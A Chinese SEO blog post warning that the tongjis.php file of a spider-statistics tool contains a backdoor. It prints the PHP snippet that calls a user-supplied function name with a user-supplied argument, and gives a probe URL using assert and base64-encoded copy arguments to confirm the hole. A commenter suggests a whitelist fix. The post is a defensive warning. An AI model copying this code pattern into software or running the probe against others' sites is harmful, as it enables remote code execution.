本站所有内容仅限用于学习和研究目的,如有侵权请邮件与我们联系处理!
世上事本无难易,为之则易!

网站首页 蜘蛛池 蜘蛛池资讯 正文

警惕:停止使用蜘蛛统计,小心tongjis.php的后门

曹操 2023-09-19 蜘蛛池资讯 825 ℃ 2 评论 361字 free 收藏

请停止使用小旋风界面的零度蜘蛛统计,至少需要删除tongjis.php,据悉该文件代码中:

//进行切割调用函数:a(),b(),c()和相关的参数 具体可以在这里加入print_r($req);exit();然后前端点击3个图表(我把它区分为a b c 三个区域)的F12查看;
$req=explode("-",$req);
echo $req[0]($req[1]);	

存在被渗透的风险,据悉:域名/zhizhu/tongjis.php?assert-copy(base64_decode(加密),base64_decode(加密)),运行出来是1,就是有后门。

具体我也不懂,别用就完事了。在最新发布的免费蜘蛛统计中,已经删除了绝大部分无用的文件。


Tags:蜘蛛统计蜘蛛域名

必看说明

  • 本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。
  • 本站文章或仅为文本内容原创,非程序原创。如有侵权、不妥之处,请联系站长第一时间删除。敬请谅解!
  • 本站所有内容严格遵守国家法律的条例,所有研究的算法技术均来源于搜索引擎公开默认允许用户研究使用的接口。
  • 阅读本文及获取资源前,请确保您已充分阅读并理解《访问曹操SEO网站需知:行为准则》。
  • 本站分享的任何工具、程序仅供学习参考编写架构,仅可在本地的虚拟机内断网测试,严禁联网运行或上传搭建!
  • 任何资源必须在下载后24个小时内,从电脑中彻底删除。不得传播或者用于其他任何用途!否则一切后果用户自负!
  • 转载请注明 : 文章转载自  曹操SEO 警惕:停止使用蜘蛛统计,小心tongjis.php的后门
  • 本文标题:《警惕:停止使用蜘蛛统计,小心tongjis.php的后门》
  • 本文链接:https://ccooc.cn/2046.html

已有2位网友发表了看法:

  • 访客

    访客  评论于 [2023-09-19 15:38:26]  回复

    if ($req[0]==='c' || $req[0]==='b' || $req[0]==='a') 限制一下第一个参数是不是能堵上?

  • 曹操

    曹操  评论于 [2023-09-19 14:57:49]  回复

    以上数据由“提莫队长”提供

欢迎 发表评论:

网站分类
近期评论
文章归档
标签列表
站点信息
  • 文章总数:2022
  • 页面总数:7
  • 分类总数:46
  • 标签总数:340
  • 评论总数:8938
  • 浏览总数:5207754